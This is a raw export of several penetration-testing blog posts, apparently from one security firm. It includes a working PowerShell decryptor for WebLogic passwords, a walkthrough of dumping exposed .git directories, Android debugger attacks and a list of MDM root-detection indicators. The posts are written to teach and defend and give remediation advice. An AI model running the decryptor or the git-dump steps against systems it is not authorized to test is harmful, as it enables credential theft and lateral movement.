        $CipherText = $CipherText.TrimStart('{3DES}')
    }

    $DecodedCipherText = [System.Convert]::FromBase64String($CipherText)

    $BinaryReader = New-Object -TypeName System.IO.BinaryReader -ArgumentList ([System.IO.File]::Open($SerializedSystemIni, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite))
    $NumberOfBytes = $BinaryReader.ReadByte()
    $Salt = $BinaryReader.ReadBytes($NumberOfBytes)
    $Version = $BinaryReader.ReadByte()
    $NumberOfBytes = $BinaryReader.ReadByte()
    $EncryptionKey = $BinaryReader.ReadBytes($NumberOfBytes)

    if ($Version -ge 2)
    {
        $NumberOfBytes = $BinaryReader.ReadByte()
        $EncryptionKey = $BinaryReader.ReadBytes($NumberOfBytes)

        $ClearText = Decrypt-AES -Salt $Salt -EncryptionKey $EncryptionKey -Pass $Pass -DecodedCipherText $DecodedCipherText
    }
    else
    {
        $ClearText = Decrypt-3DES -Salt $Salt -EncryptionKey $EncryptionKey -Pass $Pass -DecodedCipherText $DecodedCipherText
    }

    Write-Host "Password:" $ClearText

}

function Decrypt-AES
{
    param
    (
        [byte[]]
        $Salt,

        [byte[]]
        $EncryptionKey,

        [char[]]
        $Pass,

        [byte[]]
        $DecodedCipherText
    )

    $EncryptionCipher = 'AES/CBC/PKCS5Padding'

    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'

    $IV = New-Object -TypeName byte[] -ArgumentList 16

    [array]::Copy($DecodedCipherText,0,$IV, 0 ,16)

    $CipherText = New-Object -TypeName byte[] -ArgumentList ($DecodedCipherText.Length - 16)
    [array]::Copy($DecodedCipherText,16,$CipherText,0,($DecodedCipherText.Length - 16))


    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher,$Salt,5)

    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher,$Pass,$AlgorithmParameters)


    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)
    $KeyCipher.Init($false, $CipherParameters)

    $Key = $KeyCipher.DoFinal($EncryptionKey)


    $Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)
    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key
    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter , $IV)

    $Cipher.Init($false, $ParametersWithIV)
    $ClearText = $Cipher.DoFinal($CipherText)

    [System.Text.Encoding]::ASCII.GetString($ClearText)
}

function Decrypt-3DES
{
    param
    (
        [byte[]]
        $Salt,

        [byte[]]
        $EncryptionKey,

        [char[]]
        $Pass,

        [byte[]]
        $DecodedCipherText
    )

    $EncryptionCipher = 'DESEDE/CBC/PKCS5Padding'

    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'

    $IV = New-Object -TypeName byte[] -ArgumentList 8

    [array]::Copy($Salt,0,$IV, 0 ,4)
    [array]::Copy($Salt,0,$IV, 4 ,4)

    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher,$Salt,5)
    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher,$Pass,$AlgorithmParameters)

    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)
    $KeyCipher.Init($false, $CipherParameters)

    $Key = $KeyCipher.DoFinal($EncryptionKey)

    $Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)
    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key
    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter , $IV)

    $Cipher.Init($false, $ParametersWithIV)
    $ClearText = $Cipher.DoFinal($DecodedCipherText)

    [System.Text.Encoding]::ASCII.GetString($ClearText)
}

Export-ModuleMember -Function Invoke-WebLogicPasswordDecryptor

I also added the ability to decrypt 3DES for older versions of WebLogic. Here's the result:

PS C:&gt; Import-Module .Invoke-WebLogicDecrypt.psm1
PS C:&gt; Invoke-WebLogicDecrypt -SerializedSystemIni "C:SerializedSystemIni.dat" -CipherText "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="
Password1

Speaking of 3DES, if you do have a newer version of WebLogic that uses AES, you can change it back to 3DES by modifying the SerializedSystemIni.dat file. A newer one will have 02  set for the 6th byte:

Img D C

Which outputs the following in WLST

root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

wls:/offline&gt; pw = encrypt('password')
wls:/offline&gt; print pw
{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=

Changing it to 01  will enable 3DES:

Img D Ca
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

wls:/offline&gt; pw = encrypt("Password1")
wls:/offline&gt; print pw                 
{3DES}vNxF1kIDgtydLoj5offYBQ==

Conclusion

The penetration test revealed three big issues. The use of a static key for encryption, installing WebLogic on an SMB share, and allowing anonymous users read access to the share. The static key is something that users don't control. I downloaded several versions of WebLogic and this is static across all of them. So if you have access to the SerializedSystemIni.dat file and have some encrypted passwords, it's possible to decrypt them all, Muahaha!!! This all depends on whether or not you have access to the WebLogic installation directory. This leads to the next issue which is installing applications in a share. Installing any application in a share is risky in itself, but not securing that share can lead to catastrophic consequences. In the penetration test, after copying down the SerializedSystemIni.dat, I could now decrypt all the encrypted passwords from my initial grep. These were local user passwords and Oracle database passwords. Everything you need for lateral movement within an environment, all from anonymous access to a share.

[post_title] => Decrypting WebLogic Passwords [post_excerpt] => The following blog walks through part of a recent penetration test and the the decryption process for WebLogic passwords that came out of it. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => decrypting-weblogic-passwords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:04 [post_modified_gmt] => 2021-06-08 21:46:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3125 [menu_order] => 684 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) [8] => WP_Post Object ( [ID] => 2254 [post_author] => 7 [post_date] => 2015-02-02 07:00:19 [post_date_gmt] => 2015-02-02 07:00:19 [post_content] =>

Every so often when performing a penetration test against a web application or a range of external/internal servers I come across publicly accessible .git directories. Git is a revision control tool that helps keep track of changes in files and folders and is used extensively in the web development community. This blog isn't going to be a tutorial on Git, so a basic understanding of how Git and revision control tools work will be helpful. I do want to point out though for people who are not familiar with Git is that every time Git is initialized in a directory, a local repository is created. Repositories contain all the commit information for every file. In this blog, I will be walking through ways in which a person can obtain information from a web server that has a publicly available .git directory. For people who know how to use Git, this blog may seen like a no brainier. None of the information here is new or groundbreaking. Everything I will be showing is basic Git functionality. The reason I am writing this blog is to educate people on why having Git on your web server can be dangerous if the server is configured incorrectly.

Here we see a simple website. There are no links to anything, but that doesn't mean we can't find something.

Img Dc F B

The easiest way to check for a git repository is to search for the .git directory.

Img Dc C Ad

This is a simple example, but it comes up quite often. Automated tools such as Nessus, Nikto, and nmap are pretty reliable for checking if this directory exists too.

We can see in the above screenshot that all the information for Git is there. Usually the first thing that I do is look at the config file. The config file contains information about the repository. This can include anything from the editor choice to smtp credentials. In this example, the git repository is only located locally with hardly any functionality, which is why not much is there.

Img Dc A C

The next thing I'm going to do is pull down the entire .git directory along with all the files and folders within it. I use a recursive wget command to do this:

 wget -r https://192.168.37.128/.git/

We now have the Git repository from the web server!

root@kali:~/192.168.37.128: ls -al
total 12
drwxr-xr-x  3 root root 4096 Dec 26 14:28 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:28 .git
root@kali:~/192.168.37.128#

Doing a simple git status , we can view local changes compared with what was on the web server repository.

root@kali:~/192.168.37.128: git status
# On branch master
# Changes not staged for commit:
#   (use "git add/rm <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#    deleted:    index.php
#
no changes added to commit (use "git add" and/or "git commit -a")

As you can see, we are missing an index.php file in our repository.

For small repositories with few files, we can simply diff the changes and view the contents of files that we do not have.

root@kali:~/192.168.37.128: git diff
diff --git a/index.php b/index.php
deleted file mode 100644
index 2bd0989..0000000
--- a/index.php
+++ /dev/null
@@ -1,13 +0,0 @@
-Hello World!
-
-<?php
-$servername = "localhost";
-$username = "admin";
-$password = "password";
-
-$conn = new mysqli($servername, $username, $password);
-
-if ($conn->connect_error) {
-    die("Connection failed: " . $conn->connect_error);
-} 
-?>

Here we can see the contents of the index.php file. We can see that it is making a connection to a local MySQL server with credentials embedded in it. Diffing is an easy way to view changes, but as repositories get larger, diffing can become cumbersome because every file spits back information and viewing everything can get annoying real fast.

An easier way to get the actual files back is to simply do a git reset --hard which resets the repository back to the last commit. Remember, every Git repository contains all the information about every commit. So when we reset the repository to the last commit, Git repopulates the directory with every file that was there.

root@kali:~/192.168.37.128: git reset --hard
HEAD is now at ec53e64 hello world
root@kali:~/192.168.37.128: ls -al
total 16
drwxr-xr-x  3 root root 4096 Dec 26 14:37 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:37 .git
-rw-r--r--  1 root root  238 Dec 26 14:37 index.php
root@kali:~/192.168.37.128:

We can see that the index.php file was added back into our local repository for viewing.

Objects

Git stores file information within the objects folder.

root@kali:~/192.168.37.128/.git/objects: ls -al
total 64
drwxr-xr-x 16 root root 4096 Dec 26 14:28 .
drwxr-xr-x  8 root root 4096 Dec 26 14:37 ..
drwxr-xr-x  2 root root 4096 Dec 26 14:28 04
drwxr-xr-x  2 root root 4096 Dec 26 14:28 07
drwxr-xr-x  2 root root 4096 Dec 26 14:28 26
drwxr-xr-x  2 root root 4096 Dec 26 14:28 2b
drwxr-xr-x  2 root root 4096 Dec 26 14:28 83
drwxr-xr-x  2 root root 4096 Dec 26 14:28 8d
drwxr-xr-x  2 root root 4096 Dec 26 14:28 8f
drwxr-xr-x  2 root root 4096 Dec 26 14:28 93
drwxr-xr-x  2 root root 4096 Dec 26 14:28 ae
drwxr-xr-x  2 root root 4096 Dec 26 14:28 ec
drwxr-xr-x  2 root root 4096 Dec 26 14:28 f2
drwxr-xr-x  2 root root 4096 Dec 26 14:28 f3
drwxr-xr-x  2 root root 4096 Dec 26 14:28 info
drwxr-xr-x  2 root root 4096 Dec 26 14:28 pack

There are two character folders with random alpha-numeric character file names inside them.

root@kali:~/192.168.37.128/.git/objects/2b: ls -al
total 12
drwxr-xr-x  2 root root 4096 Dec 26 14:28 .
drwxr-xr-x 16 root root 4096 Dec 26 14:28 ..
-rw-r--r--  1 root root  171 Dec 26 13:32 d098976cb507fc498b5e8f5109607faa6cf645

The two character folder name and the file names inside of the them actually create a SHA-1 for the blob of data. Each SHA-1 contains bits and pieces of every file within the repository.

We can actually see the SHA-1 for index.php by using the following command:

git cat-file -p master^{tree}
root@kali:~/192.168.37.128/.git: git cat-file -p master^{tree}
100644 blob 2bd098976cb507fc498b5e8f5109607faa6cf645    index.php

What this does is print out the SHA-1 for each file within the master branch on the repository.

We can then take that SHA-1 and give it to git cat-file and print out the file contents:

root@kali:~/192.168.37.128/.git: git cat-file -p 2bd098976cb507fc498b5e8f5109607faa6cf645
Hello World!

<?php
$servername = "localhost";
$username = "admin";
$password = "password";

$conn = new mysqli($servername, $username, $password);

if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
} 
?>

Branches

One other thing I like to do is see if there are any branches we can switch to that may contain other files. Running git branch will display the branches available and the current one that you are on (* indicates the current working branch).

root@kali:~/192.168.37.128: git branch
* master
  test

We can see that there is a test branch available. Let’s switch to the test branch and see if there is anything that is different between it and the master branch.

root@kali:~/192.168.37.128: git checkout test
Switched to branch 'test'
root@kali:~/192.168.37.128: ls -al
total 20
drwxr-xr-x  3 root root 4096 Dec 26 14:53 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:53 .git
-rw-r--r--  1 root root  229 Dec 26 14:53 index.php
-rw-r--r--  1 root root   15 Dec 26 14:53 secret.txt

By switching to the test branch we can see that there is an additional secret.txt file in the repository. Often times I see development branches that contain test credentials that haven't been removed and debug information within files.

Conclusion

This is by no means an exhaustive look at every thing you can do with Git repositories. I'm sure I'm probably missing some things that are causing Git aficionados to bang their heads in rage. If you are going to use Git or are using Git on a live server, make sure that the .git directory is not being indexed and the directory, sub-directories, and all files are inaccessible using server permission rules. It is also a very good practice to not include any sensitive data within files that are added to Git. This can cause nightmares if that information is pushed to places like Github or Bitbucket for all the world to see. Furthermore, the .gitignore file should be used to ensure sensitive files are properly ignored and not mistakenly added.

[post_title] => Dumping Git Data from Misconfigured Web Servers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dumping-git-data-from-misconfigured-web-servers [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:44:11 [post_modified_gmt] => 2021-06-08 21:44:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2254 [menu_order] => 690 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [9] => WP_Post Object ( [ID] => 1982 [post_author] => 7 [post_date] => 2015-01-19 07:00:44 [post_date_gmt] => 2015-01-19 07:00:44 [post_content] =>

In this blog, I am going to walk through how we can attach a debugger to an Android application and step through method calls by using information gained from first decompiling it. The best part is, root privilege is not required. This can come in handy during mobile application penetration tests because we can step into an application while it’s running and potentially obtain and write information that we normally wouldn't have access to. Some examples include intercepting traffic before it is encrypted, obtaining encryption keys when they are being used, and obtaining passwords and other sensitive data when they don’t touch the disk.  This blog should be interesting to mobile penetration testers and developers who are trying to gain a better understanding of possible attacks on the Android platform.

Requirements

Below is a list of requirements for performing the attacks covered in this blog.

For this blog I will be using Windows 8, Android Studio, and IntelliJ IDEA. The device I am using is a stock Nexus 4 running Android 4.4.4. I recommend that all the tools are added to your path environment variable so they can be easily accessed.

For those of you who want to use the APK I am using in this blog, you can download it here:

com.netspi.egruber.test.apk

Setting up the Device

The instruction below walks through how to get your device ready for testing.

Enable Developer Options

The first thing we need to do is make sure our Android device has USB debugging enabled. This is so we can communicate to it using the Android SDK tools. To do this we need to enable the Developer options. If you are running a stock Android device then this can be done by navigating to Settings > About Phone and tapping on the Build Number multiple times. Eventually it should say that the Developer options have been enabled.

Img Ab D Aadb
Img Ab Efed

Enable USB Debugging

Next we access the Developer options by going to Settings > Developer options. Then we can enable USB debugging.

Img Ab B

Plug-in Device via USB and Start ADB

After plugging the device into your computer, it should say, "USB debugging connected on the device". We also want to make sure that we can connect to the device with the Android Debug Bridge (ADB). This is software included within the Android SDK under platform-tools. By typing:

adb devices

in a shell our device should come up and look like this:

Img Ab B A B

If your device does not come up, the most likely reason is because the correct driver has not been installed (on Windows). Depending on the manufacturer, this can be obtained from the Android SDK or the manufacturer website.

Determining Debuggability

When debugging Android applications, we first have to check whether or not the application is set to be debugged. We can check this in a few different ways.

The first way is to open the Android Device Monitor in the Android SDK under the tools directory. On Windows it will be called monitor.bat. When we open the Android Device Monitor, we can see our device listed in the Devices section.

Img Ab Cb Ee

If any application on the device is set as debuggable, then the application would show up here. I created a test application and we can see here that it is not set to be debuggable.

The second way we can check for debuggability is by looking at the AndroidManifest.xml file from the APK of the application. An APK is essentially a zip file of all the information our application needs to run on an Android device.

If you do not have the APK for your application, then we have to pull it off of the Android device. Whenever an application is downloaded from the Google Play Store, it downloads the APK of the application and stores it on the device. The location of all the downloaded APK files are usually stored in /data/app  on the device. If your device is not rooted, then you will not be able to list the files in the directory.  However, if you know the name of the APK, then it can be pulled down using the adb tool. To find the name of the APK we want to pull down, open a shell and type:

adb shell

This will give us a shell on the device. Then type:

pm list packages -f

This will list all the packages on the device.

Img Ab E C Cc

Looking through the list we can find the application we want.

Img Ab E Fe

Next, we need to pull down the APK. To do this, open a shell and type the following command:

adb pull /data/app/[.apk file] [location]
Img Ab Eb D E

Now that we have our APK, we want to open it and look at the AndroidManifest.xml file. Unfortunately, we can’t unzip the APK and view the xml file. It is binary encoded and must be decoded. The most popular tool to do this is apktool. However, I have been using the tool APK Studio recently because it has a nice GUI which is easy to navigate. For the rest of the blog I will be using APK Studio.

To begin using APK Studio, select the little green android icon. Give your project a name and select the APK for APK Path. Then, give a location that everything should be saved to.

Img Ab F Cb

After opening the APK, select the AndroidManifest.xml file and look at the application node. If there is no flag that says android:debuggable , then the APK is not debuggable. If there is a flag that says android:debuggable="false" , then the APK is also not debuggable.

Img Ab F D C

Modifying the AndroidManifest.xml to Enable Debugging

The nice thing about apktool and APK Studio is that we can edit any of the decompiled Android files and recompile them. That’s what we’re going to do here. We are going to make the application debuggable by adding in the android:debuggable flag. Edit the AndroidManifest.xml so that the application node contains android:debuggable="true".

Img Ab Fc D

After we have added that flag, rebuild the APK by selecting the hammer icon in the menu. Our rebuilt APK file should be located in the build/apk  directory.

Img Ab Ace

Rebuilding the application will also sign it so that it can be installed back on the device. All Android applications have to be signed. Most applications don’t check if they were signed by the original certificate. If your application does check, then this may not work unless the portion of code that checks is edited as well.

Next we need to install our newly rebuilt APK. First, uninstall the application on the device. This can be done from the command line using adb:

adb pm uninstall[package name]

Then install using:

adb install [.apk file]

You can also uninstall and reinstall the APK with the following command:

adb install -r [.apk file]
Img Ab

Check and make sure that the reinstalled application runs correctly on the Android device. If everything is working, go back to the Android Device Monitor and our application should now appear under the Devices section.

Img Ab A D

Setting up the IDE

Now that our application is marked as debuggable, we can attach a debugger to it. But before we do that, we need to setup our IDE for the application we want to debug. For this blog, I am using IntelliJ IDEA. To begin, I am going to create a new Android Project. The application name can be anything, but the package name has to be the same name as the APK package structure.

Img Ab F D

This can be as easy as the name of the APK. However, if you are still not sure, you can look at APK Studio and follow the package structure to where the application files are located. For my application, the package structure is the name of the APK, "com.netspi.egruber.test". This can also be seen in APK Studio.

Img Ab B

Uncheck the "Create Hello World Activity" checkbox and finish creating the project by selecting the default values. After that is done, your project layout should now look like this:

Img Ab F B

Now that we have our project created, we need to populate it with the source code from the Android APK. The reason we need to do this is so the debugger knows the name of the symbols, methods, variables, etc… for the application. The nice thing about Android applications is that they can be decompiled rather easily back to mostly correct java source code. We need to do this and import all of it into our project in the IDE.

Dumping the APK and Decompiling to Source

The first thing we need to do to get the source code back from the Android application is to convert the APK file to a jar file. We can then use a java decompiler to retrieve the java source code. To do this, we are going to use the tool dex2jar. Dex2jar contains the bat file d2j-dex2jar that can be used to convert an APK to a jar file. The syntax is simple:

d2j-dex2jar.bat [.apk file]
Img Ab C E

You should now have a jar file of the APK. Next we are going to use the Java decompiler JD-GUI to open the jar file. Simply open the jar file or drag it into the workspace of JD-GUI.

Img Ab Fdc B

You should now see the package structure of the jar file. Inside all of the packages should be java files complete with readable source code. What we’re going to do now is save all of the source code to a zip file by selecting File > Save All Sources.

Img Ab F Cbe

After the source has been saved, unzip it into its own directory.

Img Ab C A

Now we need to import these two directories into our Android project in our IDE. For IntelliJ, navigate to the src folder of your project and paste the two directories in there.

Img Ab A Ab

If we go back to the project in Intellij, the project structure should update.

Img Ab C B

Clicking on one of the imported activities should show the source code. As you can see from the screenshot, the source code I imported is obfuscated using ProGuard.

Img Ab B E

Attaching the Debugger

Now that we have our project populated with source code of the application, we can then start setting breakpoints on method calls and variables to pause the execution of the process when those are reached. In this example I am setting a breakpoint on a method when someone enters a value into a text box. This does work with obfuscated code.

Img Ab A F D

After the breakpoint has been set, attach the debugger to the application process on the Android device by selecting the little screen icon in the upper right hand corner. This may be different depending on your IDE.

Img Ab

Next you will be prompted to choose a process on the device. Only debuggable processes will appear.

Img Ab C Db

After selecting the debuggable process, the debugger will connect to the device.

Img Ab A

In my test application, I will enter the number “42” into the text box that we have a breakpoint set for.

Img Ab Eb E

After selecting "Enter Code", the process pauses execution at the breakpoint. The reason why this works is because the debugger knows what is being called on the device. The compiled Android application contains debug information such as variable names that are accessible to any debugger that understands the Java Debug Wire Protocol (JDWP). If an Android application allows debugging, a JDWP compatible debugger, such as most Java IDEs, will be able to connect to the Virtual Machine of the Android application and read and execute debug commands.

Img Ab Beec

We can see that value that we entered into the application under the variables section.

Img Ab A

Conclusion

From here we can not only read data from the application, but also insert our own. This can be useful if we wanted to interrupt the flow of the program and possibly bypass application logic. By debugging, we can get a better understanding of how Android applications perform certain actions that we would otherwise be unable to see. This can come in handy especially when we need to view how encryption functions are being used and the values of dynamic keys. It is also helpful when debugging functions that interact with the filesystem or a database to see when and how information is being saved. Without the need of root privileges, we have the capability to perform these types of tests on any Android device.

[post_title] => Attacking Android Applications With Debuggers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-android-applications-with-debuggers [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:33:57 [post_modified_gmt] => 2023-03-16 14:33:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1982 [menu_order] => 693 [post_type] => post [post_mime_type] => [comment_count] => 19 [filter] => raw ) [10] => WP_Post Object ( [ID] => 1114 [post_author] => 7 [post_date] => 2014-06-23 07:00:20 [post_date_gmt] => 2014-06-23 07:00:20 [post_content] =>

Update: This post is a little bit out-of-date in regards to using the PowerShell script. Refer to the Github repo (https://github.com/NetSPI/PEchecker) for an updated script and instructions on how to use it. Today I am releasing a PowerShell script that easily displays whether images (DLLs and EXEs) are compiled with ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and SafeSEH (Structured Exception Handling). It is located at the github repo here: https://github.com/NetSPI/PEchecker. Without going into much detail, ASLR, DEP, and SafeSEH are considered best practices for all developers to implement as they help protect against users exploiting insecure code. As a side note, SafeSEH is only available when linking 32bit images. There are a few solutions out there that do this already, namely PEStudio, CFFExplorer, Windbg with plugins, and Immunity Debugger with mona.py. However, I find that each of these are inefficient for scanning multiple files. PowerShell is a great solution for this because it is a native tool and can tap into the Windows API and carve out information within files. What I’m interested in are the PE (Portable Executable) headers within compiled 32bit and 64bit images. In simplistic terms, PE Headers contain all the information needed by Windows to run compiled images. Within PE headers there is an Optional Section that contains the DLLCharacteristics member. The DLLCharacteristic member is a hex value that provides information for compiled options in a file. It is set to the additive hex values contained in the following table:

ValueMeaning
0x0001Reserved.
0x0002Reserved.
0x0004Reserved.
0x0008Reserved.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE0x0040The DLL can be relocated at load time.
IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY0x0080Code integrity checks are forced. If you set this flag and a section contains only uninitialized data, set the PointerToRawData member of IMAGE_SECTION_HEADER for that section to zero; otherwise, the image will fail to load because the digital signature cannot be verified.
IMAGE_DLLCHARACTERISTICS_NX_COMPAT0x0100The image is compatible with data execution prevention (DEP).
IMAGE_DLLCHARACTERISTICS_NO_ISOLATION0x0200The image is isolation aware, but should not be isolated.
IMAGE_DLLCHARACTERISTICS_NO_SEH0x0400The image does not use structured exception handling (SEH). No handlers can be called in this image.
IMAGE_DLLCHARACTERISTICS_NO_BIND0x0800Do not bind the image.
0x1000Reserved.
IMAGE_DLLCHARACTERISTICS_WDM_DRIVER0x2000A WDM driver.
0x4000Reserved.
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE0x8000The image is terminal server aware.

This table is from Microsoft and is located here (https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx). You can see in the table that there are values pertaining to the status of ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE), DEP (IMAGE_DLLCHARACTERISTICS_NX_COMPAT), and SEH (IMAGE_DLLCHARACTERISTICS_NO_SEH) for a compiled image. Common DLLCharacteristics values are 140 for ASLR, DEP, and SEH, and 400 for no ASLR, DEP, and SEH. If  IMAGE_DLLCHARACTERISTICS_NO_SEH is true then there is no SEH and SafeSEH is not needed. As stated before, SafeSEH is only available for 32bit images. SafeSEH can also only be used if every linked module supports it. To verify SafeSEH we need to look at the SafeSEH fields which reside in the IMAGE_LOAD_CONFIG_DIRECTORY section of a PE. Within this structure are the SEHandlerTable, which holds the virtual address of a table of relative virtual addresses for each valid handler, and the SEHandlerCount, which is the number of handlers in the valid handler table from SEHandlerTable. If SafeSEH is not used, these members and sometimes the IMAGE_LOAD_CONFIG_DIRECTORY section itself will be empty.

Automation

Note: The name of the script has been change to Check-PESecurity.ps1. All of the flags still work correctly. The PEchecker PowerShell script utilizes C# code to create the relevant structs needed for the PE Header format. A big thank you to the PowerSploit project (https://github.com/mattifestation/PowerSploit) and the Get-PEHeader script for providing a lot of insight into doing this. PEchecker provides a lot of functionality. To begin, I will show how to look at a single file. Using the command:

Get-PESecurity –file "filename"

We can see a list view of the current file with the filename, architecture, and whether it is compiled with ASLR, DEP, and SafeSEH: Power Shell We can turn this into a table in PowerShell by piping it to the format-table function. Next we can use the directory switch to scan an entire directory of files for DLLs and EXEs.

Get-PESecurity –directory "directory"

Power Shell The directory command also has support for recusing through directories. To do this simply add the recursive switch:

Get-PESecurity –directory "directory" –recursive

I also added in support for filtering files based on ASLR, DEP, and SafeSEH. To do this, use the following switches: -OnlyNoASLR -OnlyNoDEP -OnlyNoSafeSeH A great piece of functionality in PowerShell is being able to export csv files from our results. To do this run the following command:

Get-PESecurity –directory "directory" –recursive | Export-Csv output.csv

References

[post_title] => Verifying ASLR, DEP, and SafeSEH with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => verifying-aslr-dep-and-safeseh-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:56:33 [post_modified_gmt] => 2021-06-08 21:56:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1114 [menu_order] => 711 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [11] => WP_Post Object ( [ID] => 1137 [post_author] => 7 [post_date] => 2013-12-02 07:00:55 [post_date_gmt] => 2013-12-02 07:00:55 [post_content] =>

Introduction

I have taken a look at a lot of Mobile Device Management (MDM) solutions lately to figure out how they are detecting rooted Android devices. Through some research I have discovered that many of these MDM solutions use similar methods to detect rooted devices. This usually involves looking for specific packages and files, directory permissions, and running certain commands. I won't be disclosing which MDMs use which methods, but I will provide a list of packages, files, folders, and commands that I have found to be used in root detection. All the commands I will be running are on a stock rooted Nexus 4 running Android 4.2.2.

Default Files & Configurations

The first root detection checks are for default files and configurations that should be present on a non-rooted device. These may also be present in rooted devices with non-custom roms.
  1. Checking the BUILD tag for test-keys. By default, stock Android ROMs from Google are built with release-keys tags. If test-keys are present, this can mean that the Android build on the device is either a developer build or an unofficial Google build. My Nexus 4 is running stock Android from Google's (Android Open Source Project) AOSP. This is why my build tags show release-keys.
    root@android:/ # cat /system/build.prop | grep ro.build.tags
    ro.build.tags=release-keys
  2. Checking for Over The Air (OTA) certs. By default, Android is updated OTA using public certs from Google. If the certs are not there, this usually means that there is a custom ROM installed which is updated through other means. My Nexus 4 has no custom ROM and is updated through Google. Updating my device however, will probably break root.
    root@android:/ # ls -l /etc/security/otacerts.zip
    ls -l /etc/security/otacerts.zip
    -rw-r--r-- root     root         1733 2008-08-01 07:00 otacerts.zip

Installed Files & Packages

There are many files and packages that MDMs look for when detecting if a device is rooted. I have compiled a list of ones that I know for sure are being detected.
  1. Superuser.apk. This package is most often looked for on rooted devices. Superuser allows the user to authorize applications to run as root on the device.
  2. Other packages. The following list of packages are often looked for as well. The last two facilitate in temporarily hiding the su binary and disabling installed applications.
    com.noshufou.android.su
    com.thirdparty.superuser
    eu.chainfire.supersu
    com.koushikdutta.superuser
    com.zachspong.temprootremovejb
    com.ramdroid.appquarantine
  3. The following command lists packages that are currently installed on your device.
    root@android:/ # pm list packages
    package:com.android.backupconfirm
    package:com.android.bluetooth
    package:com.android.browser.provider
    package:com.android.calculator2
    package:eu.chainfire.supersu
  4. Any chainfire package. One MDM looks for any package that is developed by chainfire. The most notable one being SuperSU.
  5. Cyanogenmod.superuser. If the Cyanogenmod ROM is installed, the cyanogenmod.superuser activity may be in the com.android.settings package. This can be detected by listing the activities within com.android.settings.
  6. Su Binaries. The following list of Su binaries are often looked for on rooted devices.
    /system/bin/su
    /system/xbin/su
    /sbin/su
    /system/su
    /system/bin/.ext/.su
    /system/usr/we-need-root/su-backup
    /system/xbin/mu

Directory Permissions

Sometimes when a device has root, the permissions are changed on common directories. I have never seen this personally, but it is being checked for.
  1. Are the following directories writable.
    /data
    /
    /system
    /system/bin
    /system/sbin
    /system/xbin
    /vendor/bin
    /sys
    /sbin
    /etc
    /proc
    /dev
  2. Can we read files in /data. The /data directory contains all the installed application files. By default, /data is not readable.

Commands

A few MDMs execute common commands to detect if a device is rooted.
  1. Su. Execute su and then id to check if the current user has a uid of 0 or if it contains (root).
    shell@android:/ $ su
    shell@android:/ # id
    uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r)
  2. Busybox. If a device has been rooted, more often then not Busybox has been installed as well. Busybox is a binary that provides many common linux commands. Running Busybox is a good indication that a device has been rooted.
    root@android:/ # busybox df
    Filesystem           1K-blocks      Used Available Use% Mounted on
    tmpfs                   958500        32    958468   0% /dev
